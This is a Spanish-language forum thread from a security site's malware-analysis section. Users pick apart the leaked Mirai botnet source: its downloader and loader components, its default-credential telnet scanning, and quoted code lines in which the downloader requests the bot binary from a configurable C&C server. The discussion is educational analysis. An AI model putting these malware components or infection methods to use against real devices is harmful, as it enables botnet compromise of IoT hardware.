elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Partes de la Botnet Mirai
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Partes de la Botnet Mirai  (Leído 3,012 veces)
e

Desconectado Desconectado

Mensajes: 177


e


Ver Perfil
Partes de la Botnet Mirai
« en: 17 Julio 2019, 23:11 pm »

Hola  :D, hace poco estuve investigando algo sobre Mirai, estuve mirando el código de aquí:

https://github.com/jgamblin/Mirai-Source-Code
 y me prguntaba que eran los directorios dlr y loader, y en general como buscaba víctimas este malware.
Gracias y saludos.
En línea

e
@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: Partes de la Botnet Mirai
« Respuesta #1 en: 18 Julio 2019, 03:12 am »

Sin mirarlo dlr debe venir de downloader, "descargador" y loader "subidor".
Será para descargar y subir módulos de la botnet para añadirle funcionalidades, para descargar o subir un exploit(un código malicioso para hackear el tarjet aprovechando una fallo de seguridad) o para descargar desde ese software el propio server de la botnet o cualquier archivo.

No sé si tiene alguna función para buscar targets, lo normal es usar dorks, bases de datos, o los propios servidores de los proveedores de cámaras.

Si hay alguna parte del código que no entiendas publícala y la comentamos.
Mirai probaba a conectarse usando telnet con los credenciales por defecto.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

e

Desconectado Desconectado

Mensajes: 177


e


Ver Perfil
Re: Partes de la Botnet Mirai
« Respuesta #2 en: 18 Julio 2019, 10:31 am »

Gracias por la ayuda  :-*,
entonces, del dlr y el loader, ¿donde se ejecutaría cada uno, en el servidor o en el cliente/bot?

Creo que las víctimas las busca con fuerza bruta en las IPs, aquí puedes echarle un vistazo:
https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c

En línea

e
animanegra

Desconectado Desconectado

Mensajes: 287



Ver Perfil
Re: Partes de la Botnet Mirai
« Respuesta #3 en: 18 Julio 2019, 12:09 pm »

En lo que respecta al dlr en su main tienes esto:

Código:
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP

Esto se conecta al servidor http que tu pongas como pone en esa linea.
y hace peticiones GET a dicho server:

Código:
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))

Y se baja el contenido guardandolo en un archivo.
En línea


42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.
e

Desconectado Desconectado

Mensajes: 177


e


Ver Perfil
Re: Partes de la Botnet Mirai
« Respuesta #4 en: 18 Julio 2019, 14:11 pm »

Es decir, que lo que estaría pasando, es que lo que se ejecuta en el ordenador de la víctima es el downloader que descarga lo principal del C&C, y el loader,
 sería el programa que se ejecuta en el servidor y que responde al downloader, ¿no  :huh:?
En línea

e
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Desmantelan la segunda botnet Hlux/Kelihos Botnet
Noticias
wolfbcn 0 2,721 Último mensaje 31 Marzo 2012, 13:58 pm
por wolfbcn
mirai botnet pregunta
Análisis y Diseño de Malware
Borito30 5 5,048 Último mensaje 26 Febrero 2017, 18:51 pm
por XKC
Tu PC ahora puede ser parte de un ataque DDoS: la botnet Mirai llega a Windows
Noticias
wolfbcn 2 2,732 Último mensaje 22 Febrero 2017, 23:07 pm
por Borito30
Mirai infecta miles de dispositivos ZyXEL en Argentina
Noticias
wolfbcn 0 1,885 Último mensaje 26 Noviembre 2017, 01:31 am
por wolfbcn
Grave vulnerabilidad en routers Huawei utilizada de nuevo por la botnet Mirai
Noticias
wolfbcn 0 1,443 Último mensaje 25 Diciembre 2017, 01:41 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines